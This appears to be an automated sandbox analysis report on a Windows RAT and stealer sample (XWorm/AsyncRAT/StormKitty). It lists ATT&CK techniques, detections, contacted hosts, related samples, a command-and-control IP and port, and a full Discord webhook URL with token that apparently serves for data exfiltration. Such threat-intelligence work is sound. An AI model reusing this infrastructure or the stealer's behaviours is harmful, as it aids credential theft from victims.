Email Addresses	DNS Server	Domain Accounts	2 Scheduled Task/Job	Logon Script (Windows)	2 Scheduled Task/Job	221 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	12 Software Packing	NTDS	751 Security Software Discovery	Distributed Component Object Model	1 Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	361 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	361 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	112 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
VzhY4BcvBH.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.XWormRAT
VzhY4BcvBH.exe	100%	Avira	TR/Dropper.Gen
VzhY4BcvBH.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\svchost.exe	96%	ReversingLabs	ByteCode-MSIL.Backdoor.AsyncRAT

Source	Detection	Scanner	Label
http://212.87.215.19:37552t-sq	0%	Avira URL Cloud	safe
212.87.215.19:37552	0%	Avira URL Cloud	safe
http://212.87.215.19:37552/	0%	Avira URL Cloud	safe
http://212.87.215.19:37552	0%	Avira URL Cloud	safe
https://api.mylnikP	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
discord.com	162.159.136.232	true	false	high
ip-api.com	208.95.112.1	true	false	high
api.mylnikov.org	172.67.196.114	true	false	high
icanhazip.com	104.16.185.241	true	false	high
158.157.4.0.in-addr.arpa	unknown	unknown	true	unknown
api.ip.sb	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://icanhazip.com/	false		high
212.87.215.19:37552	true	Avira URL Cloud: safe	unknown
https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true	false		high
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	false		high
http://212.87.215.19:37552/	true	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	false		high
https://duckduckgo.com/ac/?q=	svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettings	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000007.00000002.2225174789.000001AF9ADE3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://212.87.215.19:37552t-sq	system32.exe, 00000005.00000002.2330152989.0000000002D88000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://discord.com	svchost.exe, 0000000A.00000002.4478728762.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironment	system32.exe, 00000005.00000002.2330152989.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironmentResponse	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdates	system32.exe, 00000005.00000002.2330152989.0000000002D88000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000002.2330152989.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.orgcookies//settinString.Removeg	VzhY4BcvBH.exe, 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp, system32.exe.0.dr	false		high
https://github.com/LimerBoy/StormKitty	svchost.exe, 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	false		high
https://contoso.com/	powershell.exe, 00000007.00000002.2225174789.000001AF9ADE3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2116320438.000001ED902A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2225174789.000001AF9ADE3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com	VzhY4BcvBH.exe, 00000000.00000002.2291428611.0000000003131000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov.org	svchost.exe, 0000000A.00000002.4478728762.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdate	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/0	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://icanhazip.com	svchost.exe, 0000000A.00000002.4478728762.000000000296F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	VzhY4BcvBH.exe, 00000000.00000002.2291428611.0000000003131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2093315832.000001ED80231000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2167420265.000001AF8AD71000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4478728762.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://212.87.215.19:37552	system32.exe, 00000005.00000002.2330152989.0000000002D88000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000002.2330152989.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/ip%appdata%	VzhY4BcvBH.exe, 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp, system32.exe.0.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2116320438.000001ED902A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2225174789.000001AF9ADE3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com	svchost.exe, 0000000A.00000002.4478728762.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000007.00000002.2167420265.000001AF8AF99000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.2093315832.000001ED80459000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2167420265.000001AF8AF99000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/	system32.exe, 00000005.00000002.2330152989.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000007.00000002.2167420265.000001AF8AF99000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	VzhY4BcvBH.exe, 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp, system32.exe.0.dr	false		high
https://contoso.com/Icon	powershell.exe, 00000007.00000002.2225174789.000001AF9ADE3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=	svchost.exe, 0000000A.00000002.4478728762.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	false		high
http://tempuri.org/Endpoint/CheckConnect	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	places.raw.10.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000007.00000002.2167420265.000001AF8AF99000.00000004.00000800.00020000.00000000.sdmp	false		high
http://james.newtonking.com/projects/json	svchost.exe, 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp	false		high
http://www.newtonsoft.com/jsonschema	svchost.exe, 0000000A.00000002.4478728762.000000000296F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4521155331.000000001D040000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.4502281344.0000000012612000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	false		high
https://api.mylnikov.org/geolocation/wifi?v=1.1&	svchost.exe, 0000000A.00000002.4478728762.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://user-images.githubusercontent.com/45857590/138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.pn	svchost.exe, 0000000A.00000002.4478728762.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov.org/geolocation/wifi?v=1.p	svchost.exe, 0000000A.00000002.4478728762.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdatesResponse	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5	svchost.exe, 0000000A.00000002.4478728762.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.2093315832.000001ED80459000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2167420265.000001AF8AF99000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/jsonschema	svchost.exe, 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	places.raw.10.dr	false		high
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.codeplex.com/DotNetZip	svchost.exe, 0000000A.00000002.4526492924.000000001D660000.00000004.08000000.00040000.00000000.sdmp	false		high
https://api.mylnikP	svchost.exe, 0000000A.00000002.4478728762.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.nuget.org/packages/Newtonsoft.Json.Bson	svchost.exe, 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.2093315832.000001ED80231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2167420265.000001AF8AD71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	places.raw.10.dr	false		high
https://urn.to/r/sds_see	svchost.exe, 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp	false		high
http://api.mylnikov.org	svchost.exe, 0000000A.00000002.4478728762.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micros	powershell.exe, 00000007.00000002.2245161767.000001AFA33F0000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
162.159.136.232	discord.com	United States	13335	CLOUDFLARENETUS	false
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
172.67.196.114	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false
212.87.215.19	unknown	Germany	395800	GBTCLOUDUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1563741
Start date and time:	2024-11-27 12:16:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	VzhY4BcvBH.exe renamed because original name is a hash value
Original Sample Name:	1D3961A5C49F14F107E4CEE038D45FD0.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@28/195@8/5
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 55% Number of executed functions: 189 Number of non-executed functions: 7
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6180 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6532 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: VzhY4BcvBH.exe

Simulations

Behavior and APIs

Time	Type	Description
06:17:01	API Interceptor	31x Sleep call for process: powershell.exe modified
06:17:18	API Interceptor	65x Sleep call for process: system32.exe modified
06:17:22	API Interceptor	1x Sleep call for process: VzhY4BcvBH.exe modified
06:18:02	API Interceptor	12857205x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	Client.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	file.exe	Get hash	malicious	PureCrypter, Amadey, Cerbfyne Stealer, Credential Flusher, Cryptbot, LummaC Stealer, Poverty Stealer	Browse	ip-api.com/json/
	file.exe	Get hash	malicious	Cerbfyne Stealer	Browse	ip-api.com/json/
	file.exe	Get hash	malicious	Cerbfyne Stealer	Browse	ip-api.com/json/
	oIGNK22EVW.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/
	5WTfUvmHO0.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/
	4sN88dMzwC.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/
	JEr70NrBvQ.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/
	8wLgIg588m.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/
	DmI602ZFyp.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/
162.159.136.232	S23UhdW5DH.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc	Browse	discord.com/administrator/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	5QnwxSJVyX.doc	Get hash	malicious	Unknown	Browse	162.159.136.232
	speedymaqing.exe	Get hash	malicious	Python Stealer, Discord Token Stealer	Browse	162.159.138.232
	main.exe	Get hash	malicious	Blank Grabber, SilentXMRMiner, Xmrig	Browse	162.159.135.232
	EsgeCzT4do.exe	Get hash	malicious	XWorm	Browse	162.159.137.232
	cmd.exe	Get hash	malicious	Blank Grabber	Browse	162.159.128.233
	spacers.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	EternalPredictor.exe	Get hash	malicious	Blank Grabber, Skuld Stealer, XWorm	Browse	162.159.128.233
	program.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	RuntimeusererVers.exe	Get hash	malicious	Python Stealer	Browse	162.159.138.232
	NEVER OPEN!.exe	Get hash	malicious	Python Stealer, Empyrean, Discord Token Stealer	Browse	162.159.137.232
ip-api.com	Client.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	file.exe	Get hash	malicious	PureCrypter, Amadey, Cerbfyne Stealer, Credential Flusher, Cryptbot, LummaC Stealer, Poverty Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	Cerbfyne Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	Cerbfyne Stealer	Browse	208.95.112.1
	oIGNK22EVW.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	5WTfUvmHO0.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	4sN88dMzwC.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	JEr70NrBvQ.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	8wLgIg588m.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	DmI602ZFyp.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
api.mylnikov.org	d29z3fwo37.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	BTC.exe	Get hash	malicious	AsyncRAT, Rezlt, StormKitty, VenomRAT, Vermin Keylogger, WorldWind Stealer, XWorm	Browse	172.67.196.114
	client2.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	Client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	vYz1Z2heor.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	WinRAR 7.01 Pro.exe	Get hash	malicious	PureLog Stealer, WorldWind Stealer	Browse	104.21.44.66
	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse	104.21.44.66
	eEo6DAcnnx.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	83MZfLKh7D.exe	Get hash	malicious	AsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLine	Browse	104.21.44.66

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	HQV-224647.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://prod.jaspir.com/biowa/	Get hash	malicious	Unknown	Browse	172.64.150.216
	https://citiscapegroupae-my.sharepoint.com/:li:/g/personal/asekhar_citiscapegroup_com/E9U24ACMrctKoLKfReMWVjMBfxodtw3c4oUIHo4oyReVhg?e=SgIv5D&xsdata=MDV8MDJ8ZGVyZWsuZGVscG9ydEBvbnRoZWRvdC5jby56YXw5ZWEzNzFkNDdmNTM0YzE2Yjg5YTA4ZGQwZTAwZjY1OXwxMGRjN2M5NjU5NzY0NjAxODgyYzlhYzdjMjg3MGVjY3wxfDB8NjM4NjgyMTE5NTE1MDk3NDExfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=S3JqYzUxeUd4SmtWMEVWUzBMU3JUREpWTEJiN3VmeFVrY09ucElOZDRzaz0%3d	Get hash	malicious	Unknown	Browse	1.1.1.1
	tmpE43E.htm	Get hash	malicious	Unknown	Browse	104.18.27.193
